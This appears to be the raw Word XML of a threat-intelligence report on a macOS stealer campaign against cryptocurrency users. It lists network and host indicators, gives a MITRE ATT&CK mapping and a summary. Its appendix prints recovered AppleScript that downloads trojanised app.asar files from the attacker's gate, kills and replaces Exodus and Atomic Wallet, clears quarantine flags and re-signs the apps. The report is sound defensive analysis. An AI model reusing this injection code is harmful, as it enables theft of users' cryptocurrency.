              <w:t>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90411C9" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>sea-fire[.]com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="4C356BBC" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="47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AF70185" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>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1023199" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>ogromnistol[.]com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="170B2FD3" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="47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872EB22" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>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BB34282" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>hxxps://ogromnistol[.]com/debug/loader.sh?build=e743990506148cbbcc2675048e5b6f78</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="36DF6A61" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="47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33666C7" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>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911B1D0" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>hxxps://ogromnistol[.]com/api/debug/event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3400E1C8" w14:textId="1C6A0FB3" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:lastRenderedPageBreak/>
        <w:t>Host-Based IOCs</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="99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8059"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="3B878C12" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="50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0E287A1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D79FA64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Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="45DCA067" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="4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A155BCA" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20"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06F38A4" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>/tmp/shub_log.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="0D5EB6BD" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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C026B6F" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>File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3E0425D" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Malicious .asar files in wallet directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="27762ADA" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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595390B" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>File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8BA204E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Malicious .plist files in wallet directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="6935084D" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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B56B0DA" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Persistence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7CB9C39" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>LaunchAgent masquerading as Google Chrome updater</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="328C6AC2" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="005E4570" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="75AA68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FE866D2" w14:textId="5248E373" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc230012193"/>
      <w:r w:rsidRPr="001E1C20">
        <w:t>MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="99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6167"/>
        <w:gridCol w:w="1516"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="5544D4ED" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="516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1BD7808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Tactic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CB29A6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Technique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6ADA56E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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="747809C8" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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CA96F6C" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Initial Access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B246E95" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Drive-by Compromise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FB316A1" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1189</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="065A4625" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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C1C420E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Initial Access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31EEB6E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>SEO Poisoning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43A945A" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1608.006</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="13270882" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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041C03F" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Defense Evasion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57923AE" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Obfuscated Files or Information (Base64)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35A882E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1027</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="71FC27D7" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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B7E14C1" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Defense Evasion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EEF0C6E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>User-Agent Filtering / Geofencing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3BC830C" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1480</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="40FB5002" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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191640E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Defense Evasion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1B85E26" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Masquerading (Chrome Update)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900DBC1" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1036</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="0FBB4F8D" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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4392EDA" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>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0C717AC" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Command and Scripting Interpreter: Zsh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0E3D6FD" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1059.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="28A9D339" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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FE78B13" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>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0CF09E2" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Command and Scripting Interpreter: AppleScript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1BADC7E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1059.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="245C41D5" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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618F884" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Discovery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702AC61" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>System Information Discovery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C9BE992" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1082</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="1D00D86D" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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2566046" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Collection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6B81361" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Data from Local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ECC41B1" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="1AA03A48" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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47B9F1F" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Collection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59433B7" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Credentials from Password Stores: Keychain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190C9F3" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1555.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="3CF47F21" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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FE8AF2E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Collection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6C953513" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Browser Information Discovery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322110A" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1217</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="201E5453" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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ABDEE4E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Exfiltration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36BED98" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Exfiltration Over C2 Channel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E86B017" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="28CA7656" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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695B231" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Persistence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7E1EAEC" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Launch 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0FE59DE" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1543.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="4416BAA4" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="5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A2A8F2A" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>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DC33ADD" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>Resource Hijacking / Wallet Injection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5B60CD2" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
              <w:t>T1496</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37030410" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="005E4570" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1C8F277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8EEC50" w14:textId="1453D659" w:rsidR="00973837" w:rsidRPr="00973837" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc230012194"/>
      <w:r w:rsidRPr="001E1C20">
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="001E1C20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3BC1C" w14:textId="2B4E599C" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16743D44" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>This campaign represents a well-crafted, multi-stage macOS attack chain targeting cryptocurrency users and individuals with sensitive documents. The threat actor demonstrates operational security awareness through the use of geofencing, User-Agent filtering, Google referrer enforcement, and self-deleting scripts. The use of an aged domain and SEO poisoning suggests a deliberate and resourced campaign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D2FD2B" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20"/>
    <w:p w14:paraId="48B7B38F" w14:textId="4F11AB6B" w:rsidR="00973837" w:rsidRPr="00973837" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc230012195"/>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Appendix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="3C5489EE" w14:textId="4242C85D" w:rsidR="00973837" w:rsidRPr="00973837" w:rsidRDefault="00973837" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00973837">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Wallet injection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1C20" w14:paraId="5A0C7CE9" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08162C7C" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55B53D2E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debugLog("--- WALLET INJECTION ---")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F8E70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exodusPath to "/Applications/Exodus.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC3BECC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if (do shell script "test -d " &amp; quoted form of exodusPath &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F7B8E59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debugLog("Exodus FOUND at " &amp; exodusPath &amp; ", injecting...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6210B7EF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try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="366D303B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asarUrl to gateUrl &amp; "/exodus-asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15E00A33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tempZip to "/tmp/exodus_asar.zip"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF3F3EF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tempAsar to "/tmp/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FE1F482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"curl -s -o " &amp; quoted form of tempZip &amp; " " &amp; quoted form of asarUrl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6E1385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"unzip -q -o " &amp; quoted form of tempZip &amp; " -d /tmp"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BEF8533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if (do shell script "test -f " &amp; quoted form of tempAsar &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED5AB9F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"pkill -9 Exodus 2&gt;/dev/null || true"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6625F882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delay 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59BB75E8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exodusResources to "/Applications/Exodus.app/Contents/Resources"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07A7279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targetAsar to exodusResources &amp; "/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32A68B52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"cp -rf " &amp; quoted form of exodusPath &amp; " /tmp/Exodus_tmp.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3B9CDC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"rm -rf " &amp; quoted form of exodusPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BFD761F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"mv /tmp/Exodus_tmp.app " &amp; quoted form of exodusPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A940B3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"mv " &amp; quoted form of tempAsar &amp; " " &amp; quoted form of targetAsar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29241122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"xattr -cr " &amp; quoted form of exodusPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67B213B9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"codesign -f -d -s - " &amp; quoted form of exodusPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35ABA043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debugLog("Exodus: injection OK")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="142FEE14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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DCD308A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"rm -f " &amp; quoted form of tempZip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13CBC540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on error errMsg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B5AD4B0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debugLog("Exodus: injection FAIL | " &amp; errMsg)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369E0C66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lastRenderedPageBreak/>
              <w:t>end try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="684E8230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if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E5632D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atomicPath to "/Applications/Atomic Wallet.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="491A72DD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if (do shell script "test -d " &amp; quoted form of atomicPath &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B566FF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debugLog("Atomic Wallet FOUND at " &amp; atomicPath &amp; ", injecting...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="483D0EE4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try</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69711AE4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asarUrl to gateUrl &amp; "/atomic-asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33218368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tempZip to "/tmp/atomic_asar.zip"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27BAF9CF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tempAsar to "/tmp/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B0E498C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"curl -s -o " &amp; quoted form of tempZip &amp; " " &amp; quoted form of asarUrl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E286768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"unzip -q -o " &amp; quoted form of tempZip &amp; " -d /tmp"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F140208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if (do shell script "test -f " &amp; quoted form of tempAsar &amp; " &amp;&amp; echo 1 || echo 0") is "1" then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9ED37B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"pkill -9 'Atomic Wallet' 2&gt;/dev/null || true"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0124092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delay 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7FCD32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atomicResources to "/Applications/Atomic Wallet.app/Contents/Resources"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67EFE190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targetAsar to atomicResources &amp; "/app.asar"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78AD33EA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"cp -rf " &amp; quoted form of atomicPath &amp; " /tmp/Atomic_tmp.app"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27AD99B6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"rm -rf " &amp; quoted form of atomicPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49EE9EC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"mv /tmp/Atomic_tmp.app " &amp; quoted form of atomicPath</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="624E12F4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"mv " &amp; quoted form of tempAsar &amp; " " &amp; quoted form of targetAsar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683A1299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"xattr -cr " &amp; quoted form of atomicPath</w:t>
            </w:r>
          </w:p>
